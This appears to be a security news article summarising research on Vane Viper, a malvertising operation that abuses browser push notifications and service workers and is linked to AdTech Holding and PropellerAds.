Adversaries Misuse Advertising Technologies to Deliver Harmful Advertisements towards Users.
In the ever-evolving world of digital marketing, a new threat has emerged, known as Vane Viper. This operation, connected to AdTech Holding, a Cyprus-based company, has been making waves in the digital advertising ecosystem.
Vane Viper employs malicious service workers to manipulate browser behaviour and maintain long-term access to compromised systems. The operation is particularly resilient, with its core infrastructure domains, including those of Google, Apple, and various push notification services, maintaining operations for over 1,200 days, despite takedown attempts.
The infrastructure of Vane Viper spans approximately 60,000 domains, a fraction of the broader malicious ecosystem they control. The operation abuses browser push notifications to achieve persistent access to victim devices, with users who accept these notifications becoming part of a persistent malvertising network.
Analysis reveals that most operational domains remain active for less than a month, with registration counts reaching 3,500 domains in peak months. Vane Viper demonstrates remarkable resilience through its domain management strategy, cycling through thousands of newly registered domains each month.
The remote URL is determined by hardcoded domains within the service worker, creating a dynamic command and control mechanism. Service workers employed by Vane Viper also use script chaining techniques to abuse push notifications, with the most concerning element being their use of the fetch() function to execute arbitrary content fetched from remote URLs.
Vane Viper's reach extends beyond traditional malware distribution, encompassing fake shopping sites, fraudulent browser extensions, survey scams, and adult content. The digital advertising ecosystem is a prime target for cybercriminals, and Vane Viper is a stark reminder of this reality.
Infoblox researchers have identified compelling evidence suggesting that PropellerAds, a subsidiary of AdTech Holding, may be involved in ad-fraud campaigns. The initiators behind the Vane Viper operation are connected to PropellerAds and its parent company AdTech Holding. Researchers have exposed that PropellerAds is not merely abused but actively participates in and facilitates malware distribution and ad fraud through its adtech network.
PropellerAds operates as both an advertising network and traffic broker, making it a strategic player in the digital advertising ecosystem. However, its involvement in such malicious activities raises serious concerns about the transparency and security of the digital advertising industry.
As the battle against cyber threats continues, it is crucial to stay vigilant and informed about the tactics and strategies used by malicious actors like Vane Viper. By understanding these threats, we can take proactive measures to protect ourselves and our digital assets.
